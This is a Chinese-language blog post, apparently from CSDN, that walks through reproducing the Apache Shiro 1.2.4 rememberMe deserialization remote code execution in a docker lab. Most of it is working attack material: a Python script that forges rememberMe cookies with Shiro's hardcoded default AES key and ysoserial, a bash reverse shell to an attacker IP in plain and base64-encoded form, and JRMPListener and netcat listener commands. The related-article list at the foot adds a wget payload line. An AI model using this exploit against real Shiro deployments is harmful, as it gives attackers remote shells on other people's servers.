Apache Shiro java反序列化漏洞复现

最新推荐文章于 2024-04-17 04:34:27 发布
最新推荐文章于 2024-04-17 04:34:27 发布
阅读量1.3k 收藏 5
点赞数 3
分类专栏: Apache 反序列化漏洞 漏洞复现 文章标签: 安全漏洞 安全 信息安全 shiro 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darling023/article/details/108117654
版权

Apache Shiro java反序列化漏洞复现

在这里插入图片描述

影响版本

Apache Shiro <= 1.2.4

环境搭建
准备环境

攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境
**靶机:**带docker的Linux就行

靶机环境搭建

获取docker镜像

docker pull medicean/vulapps:s_shiro_1

重启docker

systemctl restart docker

启动docker镜像:

docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
复现过程

先制作exp

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):  #ysoserial-0.0.6-SNAPSHOT-all.jar #文件需要在该文件目录

    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)  
    BS = AES.block_size  
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()  
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  
    iv = uuid.uuid4().bytes  
    encryptor = AES.new(key, AES.MODE_CBC, iv)  
    file_body = pad(popen.stdout.read())  
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))  
    return base64_ciphertext


if __name__== '__main__':  
	payload = encode_rememberme(sys.argv[1])
		
print ("rememberMe={0}".format(payload.decode()))

使用此exp生成payload

python .\PopX.py 192.168.136.1:3888

执行时可能遇见无Crypto这个插件的报错
更改pip源:直接在user目录中创建一个pip目录,如:C:\Users\xx\pip,新建文件pip.ini文件
文件内容

[global]
index-url = https://pypi.tuna.tsinghua.edu.cn/simple
[install]
trusted-host=pypi.tuna.tsinghua.edu.cn

但是下载Crypto时会报错,可以直接下载pycryptodom
pycrypto、pycrytodome和crypto是一个东西,crypto在python上面的名字是pycrypto,它是一个第三方库,但是已经停止更新三年了,所以不建议安装这个库; 这个时候pycryptodome就来了,它是pycrypto的延伸版本,用法和pycrypto是一模一样的

pip3  install pycryptodome

成功安装后就可以执行EXP了

接下来制作反弹 shell 代码
弹shell命令

bash -i >& /dev/tcp/192.168.136.1/8888 0>&1

使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码 跳转
在这里插入图片描述
编码后如下

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNi4xLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}

然后进行 Java 反序列化绕过 base64 编码 powershell执行
再使用 `ysoserial` 中 JRMP 监听模块,监听 3888 端口 ` 注意这里的端口是刚才生成 rememberMe 值的端口 `。再加上生成的 base64 编码。

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 3888 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNi4xLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}'


可以写成CommonsCollections4或者CommonsCollections2
使用nc监听端口

nc -lvvp 8888

在这里插入图片描述

命令执行
抓取登录时的数据包,注意抓取的时候点上 remember me

抓取登录后的第二个GET包,将JSESSIONID删除掉。

出现这个为成功

查看ysoserial的监听端口

查看NC的监听的端口

执行命令

攻击成功

参考链接:
https://blog.csdn.net/u011975363/article/details/102391669
https://www.chainnews.com/articles/653693771328.htm

YUyuanAN_COM
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro序列漏洞
m0_52789121的博客
04-07 4631
目录 简介: 靶场环境 漏洞 一、手工 二、图形工具 简介: Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性 漏洞原理: Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再序列,就导致了序列RCE漏洞。 那么,Payload
ysoserial的代码学习
问题很多的小明
08-29 625
序列漏洞利用神器:ysoserial 0x01ysoserial 工具模块 我们以为shiro远程加载序列数据的利用场景为例: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test' 其中-cp指定了类路径为: ysoserial.exploit.
apache shiro 序列漏洞解决方案_apache shiro序列解决方法
最新发布
2301_79056657的博客
04-17 1334
这个通过观察shiro1.2.4版本的源代码可以发,如果不指定密钥,shiro会默认一个初始密钥,该密钥是被硬编码在代码中,由于代码是开源的,攻击者很容易找到该密钥,并且伪造cookie发起攻击。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。注意 这是在使用shiro默认密钥的情况下,如果应用修改了默认密钥则需要保证该密钥不是公开的,并妥善保管防止泄露。
【网络安全---漏洞shiro550序列漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4107
shiro550序列漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Apache Shiro Java序列漏洞(CVE-2016-4437)
qq_45300786的博客
12-25 689
我只是个无情的挂马机器,原理相信百度一大把,我就不赘述了 0x00 环境要求 靶机:192.168.100.23 攻击机:192.168.100.34 0x01 环境搭建 这里使用docker进行环境搭建: 下载 git clone https://github.com/Medicean/VulApps/tree/master/s/shiro/1 1.拉取环境到本地 $ docker pull medicean/vulapps:s_shiro_1 2.启动环境 $ docker run -d -p 8080
Apache shiro 漏洞总结
星落的博客
08-01 4557
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
Apache shiro1.2.4序列漏洞介绍.docx
07-01
Apache shiro1.2.4序列漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro序列漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修了这个序列漏洞。 2. **禁用不必要的序列**:避免在不受信任的输入上进行序列,尤其是在处理网络数据时。 3....
Shiro_exploit:Apache Shiro Java序列漏洞的分析和利用
03-10
Apache Shiro Java序列进攻分析及利用0x00项目地址0x01概述两者天被派去去护网&重保,态势感知报告了一条冰蝎的远程代码执行的纠正,在通过日志以及webshel​​l及相关信息,红队大概是通过shiro序列拿到...
shiro序列漏洞暴力破解漏洞检测工具
09-14
1.shiro序列漏洞、暴力破解漏洞检测工具源码 2.shiro序列漏洞、暴力破解漏洞检测工具jar包 3.shiro序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
ysoserial下载
12-26
java序列漏洞检测工具,可以自动生成playload,测试用的 有需要的同学拿去用
ysoserial-0.0.6-SNAPSHOT-all.jar
05-23
编译好的ysoserial.可序列问题。
CVE-2016-4437 Shiro序列漏洞
weixin_45260839的博客
05-15 2760
CVE-2016-4437 Shiro序列漏洞
经典的Shiro序列漏洞
hackzkaq的博客
11-27 725
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;没看够~?欢迎关注!
shiro序列漏洞
qq_41696518的博客
06-27 1468
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且序列,最终造成序列漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
Java序列漏洞(ysoserial工具使用、shiro序列利用)
qq_50854662的博客
05-26 1792
Java序列漏洞(ysoserial工具使用、shiro序列利用)
vulhub漏洞-jboss序列漏洞
weixin_45095113的博客
12-21 647
vulhub漏洞-jboss序列漏洞
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值